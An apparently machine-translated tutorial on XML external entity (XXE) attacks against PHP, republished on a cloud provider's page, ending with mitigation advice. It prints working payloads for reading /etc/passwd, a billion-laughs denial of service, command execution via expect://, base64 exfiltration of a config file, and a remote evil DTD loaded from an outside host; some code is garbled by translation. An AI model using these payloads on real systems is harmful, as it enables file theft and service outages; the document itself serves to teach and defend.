PHP XXe attack

Source: Internet
Author: User
Tags base64

PHP Entites:

Pre-defined:&<& #37;

General entity: <! ENTITY General "Hello", call mode: in <a>&general;</a>, cannot be included in the attribute.

Parametric entity: <! ENTITY% param "world";, call method, immediate use:%param;

Both the general entity and the parameter entity can contain internal resources (DTDs) and external resources

Harm:

(1) Local file read

<?xml version= "1.0" encoding= "Utf-8"?>
<! DOCTYPE Xdsec [<! ENTITY XXe SYSTEM "FILE:///ETC/PASSWD" >]>
<methodname>&xxe;</methodname>

(2) Dos attacks (Access/dev/zero), nested interpretation entities

<?xml version= "1.0"?>

<! DOCTYPE Lolz [

<! ENTITY lol "LOL" >

<! ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;" >

<! ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2 ;" >

<! ENTITY Lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3 ;" >

<! ENTITY Lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4 ;" >

<! ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5 ;" >

<! ENTITY Lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6 ;" >

<! ENTITY Lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7 ;" >

<! ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8 ;" >

]>

<lolz>&lol9;</lolz>

(3) Resources in LAN

(4) port scan (http://192.168.1.3:22)

(5) Take advantage of some protocol takeaway resources (Php:http,java:gopher (low version), FTP (high version))

(6) Execute the command, if PHP supports the expect extension, it can execute the system command, eg:<! ENTITY a SYSTEM ' expect://uname ' >

General use of ideas:

1, normal output

2, using error information, such as parsing XML errors, Dtd,schema check

Xml:web.xml,tomcat-users.xml,jetty.xml,httpd.conf of interest in the 3,web system

Takeaway: Php://filter/convert.base64-encode/resource=web.xml

Allow_url_fopen = On

4,blind techniques, XSD values bruteforce

Analytic algorithm for parameter entities:

To load an external entity, eg:

<?xml version= "1.0" encoding= "Uq-8"?>

<! DOCTYPE HTML [<! ENTITY % Internal SYSTEM "Local_file.xml" >

%internal;] >

Local_file.xml:

<! ENTITY title "Hello, world!" >

The parsed effect is:

%internal; To replace with <! ENTITY title "Hello, world!" >

Out-of-band attack:

test.php

<?php

Libxml_use_internal_errors (TRUE);

Libxml_disable_entity_loader ();

$xml 1=<<<eof

<?xml version= "1.0" encoding= "UTF-8" standalone= "no"?>

<! DOCTYPE any [

<! ENTITY XXe SYSTEM "FILE:///ETC/PASSWD" >

]>

<x>&xxe; </x>

EOF;

$dom 1 = new DOMDocument ();

$dom 1->loadxml ($xml 1);

Print_r ($dom 1);

$fields = $dom 1->getelementsbytagname (' x ');

foreach ($fields as $field)

{

Print_r ($field->nodename);

Print_r ($field->textcontent);

}

Print_r ($dom 1->savexml ());

$xx = simplexml_load_string ($xml 1);

Print_r ($XX);

Print_r (Libxml_get_errors ());

Libxml_clear_errors ();

Print_r ("Enderror");

?>

Allow_url_fopen=0 the SYSTEM "http://127.0.0.1:22" is not allowed in entity, FTP is the same

The normal entity can only be in the content box, not allowed to appear in the attribute, such as <a>&xxe;</a>

In the experimental process encountered through Print_r ($dom->savexml ()) did not parse the content, through strace tracking, found that access to/etc/passwd, but there is no output, only the output of the content before the unresolved &xxe; have been visited, why not output it? It is possible that the output function does not work, in another way to access the content, it is normal output.

Php-i get compiled information, including supported modules, such as finding the Libxml in the DOM:

Dom

Dom/xml = Enabled
Dom/xml API Version = 20031129
Libxml Version = 2.7.8
HTML support = = enabled
XPath support = = enabled
XPointer support = Enabled
Schema support = Enabled
Relaxng support = Enabled

Libxml

LibXML support = + Active
LibXML Compiled Version = 2.7.8
LibXML Loaded Version = 20708

LibXML streams = Enabled

SimpleXML

Simplexml support = Enabled
Revision = $Revision: 314376 $
Schema support = Enabled

Xml

XML support = = Active
XML Namespace support = = Active
LIBXML2 Version = 2.7.8

Which is made up of XML, SVG format, docs format, xml,xlsx

There is a problem with the following function: Domdocument.loadxml (), Simple_xml_loadfile and XmlReader function, load ()

Transfer tips:

<?xml version= "1.0"? ><! DOCTYPE results [
<! ENTITY harmless SYSTEM "Php://filter/read=convert.base64-encode/resource=/var/www/config.ini" >]><results > <result>&harmless;</result></results>

How to introduce external entities:

test.php

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/6B/FB/wKioL1U8xEuCoW2CAADeS8-2V5A708.jpg "title=" Test_ Php.png "alt=" Wkiol1u8xeucow2caades8-2v5a708.jpg "/>

EVIL.DTD:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/6B/FF/wKiom1U8wvnRKvWiAAB3nzE9Omc234.jpg "title=" Evil_ Php.png "alt=" Wkiom1u8wvnrkvwiaab3nze9omc234.jpg "/>

Results:

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/6B/FB/wKioL1U8xHPSBLEJAAFnQcIB2GM494.jpg "title=" Result.png "alt=" Wkiol1u8xhpsblejaafnqcib2gm494.jpg "/>

(2) in the properties, only PHP can

test1.php

$xml 1=<<<eof
<?xml version= "1.0" encoding= "UTF-8" standalone= "no"?>
<! DOCTYPE Root [
<! ENTITY% remote SYSTEM "HTTP://10.65.60.111/EVIL.DTD2" >
%remote;
%param1;
<root attrib= "&internal;" />
EOF;

EVIL.DTD2:

<! ENTITY% Payload SYSTEM "FILE:///ETC/PASSWD" >
<! ENTITY% param1 "<! ENTITY internal '%payload; ' > ">

Unsuccessful, general report internal error

Solution:

1, upgrade the LIBXML2 library version to more than 2.9, from more than 2.9 does not default to execute external entities.

2, perform Libxml_disable_entity_loader (true) before using import, disable entity

3, if it is resolved using XmlReader or Dom method,

$doc = Xmlreader::xml ($badXml, ' UTF-8 ', libxml_nonet); With the DOM functionality:

$dom = new DOMDocument (); $dom->loadxml ($badXml, libxml_dtdload| LIBXML_DTDATTR)



PHP XXe attack

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.